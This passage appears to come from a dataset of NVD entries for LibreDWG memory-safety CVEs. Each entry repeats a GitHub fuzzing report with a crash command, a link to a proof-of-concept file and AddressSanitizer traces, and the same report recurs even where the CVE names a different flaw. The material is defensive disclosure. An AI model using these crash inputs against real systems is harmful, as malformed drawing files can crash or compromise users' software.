0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20012
2019-12-27T01:15:13.460
An issue was discovered in GNU LibreDWG 0.92. Crafted input will lead to an attempted excessive memory allocation in dwg_decode_HATCH_private in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643088" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6967607-F26E-477A-8D60-8B0D55594EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643088
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20013
2019-12-27T01:15:13.523
An issue was discovered in GNU LibreDWG before 0.93. Crafted input will lead to an attempted excessive memory allocation in decode_3dsolid in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/compare/0.9.2...0.9.3" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643060" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "09B5D2C4-D4B2-4226-AA34-A346E6064FA2", "versionEndExcluding": "0.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643060
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20014
2019-12-27T01:15:13.587
An issue was discovered in GNU LibreDWG before 0.93. There is a double-free in dwg_free in free.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/compare/0.9.2...0.9.3" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643172" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "09B5D2C4-D4B2-4226-AA34-A346E6064FA2", "versionEndExcluding": "0.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643172
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 